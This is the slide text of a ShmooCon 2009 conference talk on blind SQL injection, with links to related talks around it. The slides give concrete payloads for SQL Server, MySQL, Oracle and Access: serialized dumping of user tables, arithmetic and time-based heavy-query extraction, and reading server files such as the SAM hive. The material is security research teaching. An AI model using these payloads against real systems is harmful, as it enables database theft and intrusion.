Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
DEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq liteDEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq liteFelipe Prado
 
An Approach to Sql tuning - Part 1
An Approach to Sql tuning - Part 1An Approach to Sql tuning - Part 1
An Approach to Sql tuning - Part 1Navneet Upneja
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101fangjiafu
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
Developing on SQL Azure
Developing on SQL AzureDeveloping on SQL Azure
Developing on SQL AzureIke Ellis
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsIvan Novikov
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 

Semelhante a ShmooCON 2009 : Re-playing with (Blind) SQL Injection (20)

ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scanners
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
DEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq liteDEF CON 27 -OMER GULL - select code execution from using sq lite
DEF CON 27 -OMER GULL - select code execution from using sq lite
 
An Approach to Sql tuning - Part 1
An Approach to Sql tuning - Part 1An Approach to Sql tuning - Part 1
An Approach to Sql tuning - Part 1
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish file
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
SQL Injection in JAVA
SQL Injection in JAVASQL Injection in JAVA
SQL Injection in JAVA
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
Developing on SQL Azure
Developing on SQL AzureDeveloping on SQL Azure
Developing on SQL Azure
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
 
Master tuning
Master tuningMaster tuning
Master tuning
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql lite android
Sql lite androidSql lite android
Sql lite android
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 

Mais de Chema Alonso

Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Chema Alonso
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoChema Alonso
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...Chema Alonso
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarChema Alonso
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordChema Alonso
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Chema Alonso
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIChema Alonso
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?Chema Alonso
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalChema Alonso
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con PythonChema Alonso
 
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...Chema Alonso
 
Guía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIRGuía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIRChema Alonso
 
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la CiberdefensaCurso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la CiberdefensaChema Alonso
 
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...Chema Alonso
 
LDAP Injection Techniques
LDAP Injection TechniquesLDAP Injection Techniques
LDAP Injection TechniquesChema Alonso
 
X Forum AUSAPE 2014
X Forum AUSAPE 2014X Forum AUSAPE 2014
X Forum AUSAPE 2014Chema Alonso
 

Mais de Chema Alonso (17)

Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0Índice Pentesting con Kali 2.0
Índice Pentesting con Kali 2.0
 
Configurar y utilizar Latch en Magento
Configurar y utilizar Latch en MagentoConfigurar y utilizar Latch en Magento
Configurar y utilizar Latch en Magento
 
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
 
CritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajarCritoReto 4: Buscando una aguja en un pajar
CritoReto 4: Buscando una aguja en un pajar
 
Pentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWordPentesting con PowerShell: Libro de 0xWord
Pentesting con PowerShell: Libro de 0xWord
 
Foca API v0.1
Foca API v0.1Foca API v0.1
Foca API v0.1
 
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
 
Auditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase IIAuditoría de TrueCrypt: Informe final fase II
Auditoría de TrueCrypt: Informe final fase II
 
El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?El Hardware en Apple ¿Es tan bueno?
El Hardware en Apple ¿Es tan bueno?
 
Latch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digitalLatch en Linux (Ubuntu): El cerrojo digital
Latch en Linux (Ubuntu): El cerrojo digital
 
Hacking con Python
Hacking con PythonHacking con Python
Hacking con Python
 
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...Analizando la efectividad de ataques de correlación pasivos en la red de ano...
Analizando la efectividad de ataques de correlación pasivos en la red de ano...
 
Guía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIRGuía de uso de Latch en la UNIR
Guía de uso de Latch en la UNIR
 
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la CiberdefensaCurso Online de Especialización en Seguridad Informática para la Ciberdefensa
Curso Online de Especialización en Seguridad Informática para la Ciberdefensa
 
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
Modelado de amenazas en el contexto de la indexación de páginas y propuesta d...
 
LDAP Injection Techniques
LDAP Injection TechniquesLDAP Injection Techniques
LDAP Injection Techniques
 
X Forum AUSAPE 2014
X Forum AUSAPE 2014X Forum AUSAPE 2014
X Forum AUSAPE 2014
 

Último

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 

Último (20)

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 

ShmooCON 2009 : Re-playing with (Blind) SQL Injection

  • 1. (Re) Playing with (Blind) SQL Injection José Palazón “Palako” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security
  • 2. Spain (…not only bulls…)
  • 4. Agenda • Serialized SQL Injection – Demo: XML Extractor • Arithmetic SQL Injection – Divide by Zero – Sums and subtractions – Type oveflow – Demo • Remote File Downloading using Blind SQL Injection – SQL Sever – MySQL – Oracle – Demo: RFD Tool • Time-Based Blind SQL Injection using heavy queries – Demo: Marathon Tool
  • 6. Serialized SQL Injection • Goal: To Merge complex resultsets in a single showable field • XML serialization functions allow to convert a resultset into a one XML string. • It´s possible to download big amount of data with single and simple injections.
  • 7. SQL Server • FOR XML: Retrieves data as a single string representing an XML tree. • RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. • BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. – union select '1','2','3',(select * from sysusers for xml raw, binary base64) • XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. – Described by Dani Kachakil
  • 8. MySQL • No default XML support, requires a server side extension • GROUP_CONCAT (v 4.1+)
  • 10. Demo: Serialized SQL Injection
  • 11. Arithmetic Blind SQL Injection
  • 12. Blind Attacks • Attacker injects code but can´t access directly to the data. • However this injection changes the behavior of the web application. • Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. – Blind SQL Injection – Biind Xpath Injection – Blind LDAP Injection
  • 13. Blind SQL Injection Attacks • Attacker injects: – “True where clauses” – “False where clauses“ – Ex: • Program.php?id=1 and 1=1 • Program.php?id=1 and 1=2 • Program doesn’t return any visible data from database or data in error messages. • The attacker can´t see any data extracted from the database.
  • 14. Blind SQL Injection Attacks • Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: – Different hashes – Different html structure – Different patterns (keywords) – Different linear ASCII sums – “Different behavior” • By example: Response Time
  • 15. Blind SQL Injection Attacks • If any difference exists, then: – Attacker can extract all information from database – How? Using “booleanization” • MySQL: – Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) » “True-Answer Page” or “False-Answer Page”? • MSSQL: – Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) • Oracle: – Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
  • 16. Arithmetic Blind SQL Injection • The query force the parameter to be numeric – SELECT field FROM table WHERE id=abs(param) • Boolean logic is created with math operations – Divide by zero – Sums and subtractions – Type overflows
  • 17. Arithmetic Blind SQL Injection • Divide by zero (David Litchfield) – Id=A+(1/(ASCII(B)-C)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, the DB will generate a divide by zero exception.
  • 18. Arithmetic Blind SQL Injection • Sums and subtractions – Id=A+ASCII(B)-C •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
  • 19. Arithmetic Blind SQL Injection • Value type overflow – Id=A+((C/ASCII(B))*(K)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] •K-> Value that overflows the type defined for A –(e.g. if A is integer, then K=2^32) – When C/ASCII(B)==1, K*1 overflows the data type
  • 20. Demo: • Divide by zero • Sums and subtractions • Integer overflow
  • 21. Remote File Downloading using Blind SQL Injection techniques
  • 22. Accessing Files • Two ways: – Load the file in a temp table • and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? – Load the file in the query • With every query the file is loaded in memory • I am very sorry, engine  • and i>ASCII(Substring(load_file(file,pos,1))??
  • 23. SQL Server 2K - External Data Sources • Only for known filetypes: – Access trough Drivers: Txt, csv, xls, mdb, log – And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:;','select top 1 * from c:dirtarget.txt’),1,1)) • Privileges – HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerProvidersDisall owAdhocAccess=0 – By default this key doesn´t exist so only users with Server Admin Role can use these functions. • NTFS permissions
  • 24. SQL Server 2K – Bulk option • Access to any file – ; Create Table TempTable as (row varchar(8000)) -- – ; Bulk Insert TempTable From 'c:file.ext' With (FIELDTERMINATOR = 'n', ROWTERMINATOR = 'n‘) -- – ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – – and (select COUNT(row) from TempTable) – and (select top 1 len(row) from TempTable where num = rownum) – and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) – ; Drop Table TempTable-- • Privileges needed – Server Role: Bulkadmin – Database Role: db_owner o db_ddladmin • NTFS permissions
  • 25. SQL Server 2k5 – 2k8 • OPENDATASOURCE and OPENROWSET supported • Bulk options improved – AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:windowsrepairsam', SINGLE_BLOB) As Data), 1, 1))— • Permisions • Bulkadmin Server Role • External Data Sources enabled • Sp_configure • Surface configuration Tool for features
  • 26. MySQL • LoadFile – SELECT LOAD_FILE(0x633A5C626F6F742E696E69) • SQLbfTools: MySQLget command (illo and dab) • http://www.reversing.org/node/view/11 • Load Data infile – ; Create table C8DFC643 (datos varchar(4000)) – ; Load data infile 'c:boot.ini' into table C8DFC643 – ; alter table C8DFC643 add column num integer auto_increment unique key – and (select count(num) from C8DFC643) – and (select length(datos) from C8DFC643 where num = 1) – and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) – ; Drop table C8DFC643
  • 27. Oracle – Plain Text files • External Tables – ; execute immediate 'Create Directory A4A9308C As ''c:'' '; end; -- – ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- – Only Plain Text files
  • 28. Oracle – DBMS_LOB ; execute immediate ‘ DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --
  • 30. Time-based Blind SQL Injection using heavy queries
  • 31. Time-Based Blind SQL Injection • In scenarios with no differences between “True- Answer Page” and “False-Answer Page”, time delays can be used. • Injection forces a delay in the response page when the condition injected is True. - Delay functions: • SQL Server: waitfor • Oracle: dbms_lock.sleep • MySQL: sleep or Benchmark Function • Postgres: pg_sleep – Ex: • ; if (exists(select * from users)) waitfor delay '0:0:5’
  • 32. Exploit for Solar Empire Web Game
  • 33. Deep Blind SQL Injection • Time delay depends on the wanted value. • E.g. “a”->10s. delay, “b”->11s. Delay, … • http://labs.portcullis.co.uk/application/deep-blind-
  • 34. Time-Based Blind SQL Injection • What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? • Can we still perform an exploitation of Time- Based Blind SQL Injection Attacks?
  • 36. “Where-Clause” execution order Select “whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?
  • 37. The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec
  • 38. The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec
  • 39. Time-Based Blind SQL Injection using Heavy Queries • Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. • It depends on how the database engine evaluates the where clauses in the query. • There are two types of database engines: – Databases without optimization process – Databases with optimization process
  • 40. Time-Based Blind SQL Injection using Heavy Queries • Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. • The Cross-join injection must be heavier than the other condition. • Attacker only have to know or to guess the name of a table with select permission in the database. • Example in MSSQL: – Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  • 41. “Default” tables to construct a heavy query – Microsoft SQL Server • sysusers – Oracle • all_users – MySQL (versión 5) • information_schema.columns – Microsoft Access • MSysAccessObjects (97 & 2000 versions) • MSysAccessStorage (2003 & 2007) 41
  • 42. “Default” tables to construct a heavy query • …or whatever you can guess – Clients – Customers – News – Logins – Users – Providers – ….Use your imagination…
  • 43. Ex 1: MS SQL Server Query lasts 14 seconds -> True-Answer
  • 44. Ex 1: MS SQL Server • Query lasts 1 second -> False-Answer
  • 45. Ex 2: Oracle Query Lasts 22 seconds –> True-Answer
  • 46. Ex 2: Oracle Query Lasts 1 second –> False-Answer
  • 47. Ex 3: Access 2000 Query Lasts 6 seconds –> True-Answer
  • 48. Ex 3: Access 2000 Query Lasts 1 second –> False-Answer
  • 49. Ex 4: Access 2007 Query Lasts 39 seconds –> True-Answer
  • 50. Ex 4: Access 2007 Query Lasts 1 second –> False-Answer
  • 51. Marathon Tool • Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. • Schema Extraction from known databases • Extract data using heavy queries not matter in which database engine (without schema) • Developed in .NET • Source code available
  • 53. Prevention: Don´t forget Bobby Tables! SANITIZE YOUR QUERIES!
  • 54. ¿Preguntas? • Speakers: – Chema Alonso (chema@informatica64.com) – Palako (palako@lateatral.com) • Autores – Chema Alonso (chema@informatica64.com) – Alejandro Martín (amartin@informatica64.com) – Antonio Guzmán (aguzman@urjc.es) – Daniel Kachakil (dani@kachakil.org) – José Palazón “Palako” (palako@lateatral.com) – Marta Beltran (mberltran@urjc.es)